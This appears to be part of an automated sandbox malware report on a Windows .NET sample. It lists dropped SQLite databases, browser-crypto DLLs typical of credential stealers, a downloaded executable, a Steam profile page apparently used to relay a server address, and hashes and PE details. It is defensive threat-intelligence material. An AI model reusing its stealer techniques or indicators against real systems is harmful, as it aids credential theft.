                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\DHIDHI-shm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):32768
                                                                                                                                                      Entropy (8bit):0.017262956703125623
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\EBKKKE

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):20480
                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\EGDGIE

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):196608
                                                                                                                                                      Entropy (8bit):1.1239949490932863
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                      MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                      SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                      SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                      SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\FCAAEB

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):51200
                                                                                                                                                      Entropy (8bit):0.8745947603342119
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                                                                                                      MD5:378391FDB591852E472D99DC4BF837DA
                                                                                                                                                      SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                                                                                                      SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                                                                                                      SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\IJJKKJJDAAAA\GHDHDG

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):159744
                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\freebl3.dll

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):685392
                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                      • Filename: nJohIBtNm5.exe, Detection: malicious, Browse
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\mozglue.dll

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):608080
                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\msvcp140.dll

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):450024
                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\nss3.dll

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\softokn3.dll

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):257872
                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\vcruntime140.dll

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):80880
                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                      Malicious:false
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ECBKKKFHCF.exe.log

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\ProgramData\ECBKKKFHCF.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):425
                                                                                                                                                      Entropy (8bit):5.353683843266035
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):425
                                                                                                                                                      Entropy (8bit):5.353683843266035
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                      MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                      SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                      SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                      SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fe13d251bbf_lsod[1].exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):391072
                                                                                                                                                      Entropy (8bit):7.98768128979655
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6144:A+wIKgwXXUXc+y+VrRlmZwTIwniaYiHQlqy1V0eUspq3lQVGpLqydC2a9EO:AQsXXUs+y+xR8aniXiHQxnFUcrVuLquE
                                                                                                                                                      MD5:BE9E376D9BAB656B145A7C8316636903
                                                                                                                                                      SHA1:D203D8C541918496D75C6C36C43DF8E98CD8AEF8
                                                                                                                                                      SHA-256:43DD8FCF131F4B471D17CBBCF8BD7C0E3C9354D9727E8FE4A8CD763029E4D98C
                                                                                                                                                      SHA-512:3BAFF4F6D869F97B4D6D6E1406074B4EE9E227F40AC3234504D4540DD9B4098A7CD9D12083D92DF4DD88389166779A67CB9D06257B635674AEA21641083E9BBC
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f............................N.... ........@.. ...................................`.....................................S.......B...........x...(&........................................................... ............... ..H............text...T.... ...................... ..`.rsrc...B...........................@..@.reloc..............................@..B................0.......H.......P...p............................................................".........^n.d...x:8"h..>.Y.....6.......ni.U..t...]O....mo'.'.Y.qM.zB.j.0t....:.J.y3R...3..s..........:..\nk.S.Nx.....q.=._...t....0.,...hpO.....~..3`.......b.u.Up{[."..(..~.@KK.$h...C.be.d...g...|;;..ZV%W..J.{R.Fb.....ef..S=............X..~[e....B [g9%/.@g.+..I..Z.h.2A.S.2.C........"...Q.k.x..;.H.{J..C...qd.L}PGb.S6.o....z..{..\x..x=8...y.....@Z...PQm..7u\.I...W..Fo.q....o<{....8\

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199780418869[1].htm

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3070), with CRLF, LF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):34879
                                                                                                                                                      Entropy (8bit):5.399047147641164
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:768:Mdpqme0Ih+3tAA6WGWefcDAhTBv++nIjBtPF5zfJkPVoEAdLTBv++nIjBtPF5x2W:Md8me0Ih+3tAA6WGWeFhTBv++nIjBtPy
                                                                                                                                                      MD5:E9E0CEE9439F4EEC3B479F6CC862222D
                                                                                                                                                      SHA1:6DD03263237E4709D154B6D547B4CD3A89FE2F87
                                                                                                                                                      SHA-256:5639FB3AEFF4367D2045EC63F269BA52A91153A12D3C823680AA02A6DEF35BFF
                                                                                                                                                      SHA-512:EB16110F08EB78722DACF1DE52A6631F79DC2051FBE6FD613D4DD8CEA518BD0FE49A3FF21AFE6BD2B438280894A08754716594B792BC262A14F739754BCC1BD3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: u55u https://49.12.197.9|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=english" rel="stylesheet" type="text/css" >.<link href="https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english" rel="stylesheet" type="text/css" >.<link href=

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\delays.tmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                      File Type:ISO-8859 text, with very long lines (65536), with no line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1048575
                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:3B33BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBh:R
                                                                                                                                                      MD5:6A4ABB285504EBA4A59429B336395E94
                                                                                                                                                      SHA1:02C74ECBA97F506EAA6BE41EF2FDA9394615B59A
                                                                                                                                                      SHA-256:8597264848CC049553CB6974E29FA98AFFE64CD3439ECAB29ED4716657D2D246
                                                                                                                                                      SHA-512:2436C77B5DA69FAE6317569993C051EEEFCB5DC3F5C75992D88607A4E5DD1A0587560E5863FE441F0D3EB381CED8929D6BBE84E969EC8ABD91E1BDE6891042B1
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Entropy (8bit):7.989192562075166
                                                                                                                                                      TrID:
                                                                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                      File name:file.exe
                                                                                                                                                      File size:423'840 bytes
                                                                                                                                                      MD5:7b5e8e3db2ce9c97f6a8214a4ccd3872
                                                                                                                                                      SHA1:e26cc5d9f9489593ae727a3358602d7b963f7f59
                                                                                                                                                      SHA256:59776469143431b5ddf203e169ed86915ff04fff5ff8e7231a53472c043eabf4
                                                                                                                                                      SHA512:2b4793d855a298b7ca36c7a9d8e5602634ddfc7c675f9bc1462a1c69d1fbd7f269354b73c361f5906da86b577f8c10589cda64acdd1fc1eae624e2ed24da5f98
                                                                                                                                                      SSDEEP:6144:RM61zc6W8/LuuBdM5+52YL3TIOwOh9Zc+5FiMwKDD19YPeOVzUZXVe1TnRwhj3AK:RTHW8TuurM5gL8avk253dbe1TnSq+5EO
                                                                                                                                                      TLSH:829423164F58AA6EDB4E15703092F612BEB175E75E81D0E3F329D060CF683922B6C629
                                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f................. ..........N?... ...@....@.. ...............................L....`................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:00928e8e8686b000

                                                                                                                                                      Static PE Info

                                                                                                                                                      General

                                                                                                                                                      Entrypoint:0x463f4e
                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                      Digitally signed:true
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      Subsystem:windows cui
                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                      Time Stamp:0x66FE10AB [Thu Oct 3 03:34:03 2024 UTC]
                                                                                                                                                      TLS Callbacks:
                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                      OS Version Major:4
                                                                                                                                                      OS Version Minor:0
                                                                                                                                                      File Version Major:4
                                                                                                                                                      File Version Minor:0
                                                                                                                                                      Subsystem Version Major:4
                                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                                                      Authenticode Signature

                                                                                                                                                      Signature Valid:false
                                                                                                                                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                      Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                      Error Number:-2146869232
                                                                                                                                                      Not Before, Not After
